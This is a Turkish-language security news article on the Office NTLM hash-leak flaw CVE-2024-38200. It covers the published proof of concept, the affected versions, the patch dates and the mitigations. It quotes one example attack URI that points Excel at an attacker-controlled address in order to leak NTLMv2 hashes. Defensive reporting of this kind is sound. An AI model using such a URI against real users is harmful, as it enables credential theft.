Güvenlik araştırmacıları, yakın zamanda açıklanan Microsoft Office güvenlik açığı CVE-2024-38200 için, saldırganların kullanıcıların NTLMv2 karmalarını ele geçirmesine olanak verebilecek bir kavram kanıtlama (PoC) istismarı yayınladı.
Bu yüksek önemdeki kusur; Office 2016, Office 2019, Office LTSC 2021 ve Kurumlar için Microsoft 365 Uygulamaları dahil olmak üzere Microsoft Office’in birden çok sürümünü etkilemektedir.
İlk olarak PrivSec Consulting’den Jim Rush ve Synack Red Team’den Metin Yunus Kandemir tarafından bildirilen güvenlik açığı, saldırganların kurbanın sisteminden saldırgan tarafından kontrol edilen uzak bir sunucuya giden bir NTLM bağlantısı başlatmasına olanak tanıyor.
Bu bağlantı oluştuğunda Windows, karma parola da dahil olmak üzere kullanıcının NTLM karmalarını otomatik olarak saldırganın sunucusuna gönderir.
ANY.RUN’un Yeni Güvenli Tarama Aracını Kullanarak Şüpheli Bağlantıları Analiz Edin: Ücretsiz Deneyin
GitHub’da yayınlanan PoC istismarı, kusurun Office URI Şemaları kullanılarak nasıl istismar edilebileceğini gösteriyor.
Saldırganlar, özel olarak biçimlendirilmiş bir URI (ör. ms-excel:ofe|u|http://192.168.1.7/leak.xlsx) oluşturarak Office uygulamalarını herhangi bir uyarı tetiklemeden uzak bir dosyaya erişmeleri için kandırabilir. Bu, hem SMB hem de HTTP protokolleri üzerinden NTLMv2 karmalarının yakalanmasına olanak tanır.
Araştırmacılar, güvenlik açığının özellikle İnternet Özellikleri’ndeki belirli Grup İlkesi Nesnesi (GPO) yapılandırmalarıyla birleştirildiğinde tehlikeli olduğunu belirtti.
Güvenilen Sitelere IP aralıkları eklemek veya Kullanıcı Kimlik Doğrulaması için otomatik oturum açmayı etkinleştirmek gibi belirli ayarlar uygulanırsa, Office uygulaması NTLM kimlik doğrulamasını otomatik olarak gerçekleştirerek kötüye kullanımı daha da kolaylaştırır.
Microsoft, 30 Temmuz 2024’te Özellik Uçuşu aracılığıyla kısmi bir düzeltme yayınlarken, 13 Ağustos 2024 güncellemeleriyle son bir yama yayınlandı. Bu arada, güvenlik uzmanları, giden NTLM trafiğinin uzak sunuculara kısıtlanması, kullanıcıların Korunan Kullanıcılar Güvenlik Grubuna eklenmesi ve TCP 445 bağlantı noktasından giden trafiğin engellenmesi dahil olmak üzere çeşitli hafifletme önlemleri önermektedir.
Bu PoC istismarının yayınlanması, kuruluşların gelecek yamaları ve önerilen hafifletici önlemleri uygulamalarının aciliyetini vurgulamaktadır.
Bu aynı zamanda, Microsoft’un Kerberos gibi daha güvenli alternatifler lehine resmi olarak kullanımdan kaldırdığı NTLM kimlik doğrulamasıyla ilgili süregelen risklerin bir hatırlatıcısıdır.
Tehdit ortamı gelişmeye devam ettikçe, sistem yöneticileri ve güvenlik profesyonelleri ortaya çıkan güvenlik açıkları hakkında bilgi sahibi olmalı ve ağlarını ve kullanıcılarını CVE-2024-38200 gibi kusurlardan yararlanan potansiyel saldırılara karşı korumak için derhal harekete geçmelidir.
Küçük İşletmelerin Gelişmiş Siber Tehditlere Karşı Nasıl Korunacağı Konusunda Ücretsiz Web Semineri -> Ücretsiz Web Semineri